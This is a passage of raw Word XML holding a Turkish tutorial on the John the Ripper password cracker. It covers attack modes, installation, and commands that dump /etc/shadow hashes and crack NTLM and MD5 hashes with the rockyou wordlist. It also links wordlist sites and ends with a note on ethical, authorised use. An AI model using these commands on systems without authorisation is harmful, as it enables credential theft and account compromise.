        <w:t xml:space="preserve"> → Tüm olasılıkları deneyerek parolayı bulmaya çalışır.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Hybrid saldırı</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Sözlük ve brute-force yöntemlerini birleştirir.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Parola testleri için optimize edilmiştir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CPU ve GPU destekli çalışabilir (OpenMP ve CUDA desteği ile).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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Multi-threading kullanarak hızlandırılabilir.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nszs30t74f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John the Ripper Nasıl Kurulur?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Linux’ta JtR’yi kurmak için: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john -y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Windows için resmi web sitesinden indirilebilir:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">🔗 John the Ripper Resmi Sitesi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hr8s1zfd4e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Kullanım Örnekleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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2icwdtp1gul" w:id="68"/>
      <w:bookmarkEnd w:id="6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1️⃣ Linux’ta /etc/shadow Parolalarını Test Etmek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Öncelikle, sistemdeki parola hash’lerini çıkartmak gerekir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unshadow /etc/passwd /etc/shadow &gt; hashlist.txt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Ardından John ile analiz yapılabilir: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hashlist.txt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m8icgsem1o" w:id="69"/>
      <w:bookmarkEnd w:id="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2️⃣ Hash Dosyası Üzerinde Parola Testi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Bir dosyadaki hashleri kırmak için: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--wordlist=/usr/share/wordlists/rockyou.txt hash.txt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thfoyhb42ce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3️⃣ Belirli Hash Türleri İçin Kullanım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--format=nt hash.txt  # Windows NTLM hashlerini kırmak için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--format=md5 hash.txt  # MD5 hashleri için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8m0cv2cu1jh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Sonuç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John the Ripper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parola güvenliği testleri ve zayıf parolaları tespit etmek</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> için kullanılan güçlü bir araçtır.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Etik hacking ve sızma testleri</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> için kullanıldığında, sistem yöneticilerine güvenliği artırma konusunda yardımcı olabilir.</w:t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Ancak </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">yetkisiz sistemlere saldırmak yasa dışıdır</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ve etik hacking kurallarına uyulmalıdır.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eakpass.com" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://weakpass.com" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/berzerk0/Probable-Wordlists" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/berzerk0/Probable-Wordlis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rackstation.net/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://weakpass.com/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://weakpass.com/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crackstation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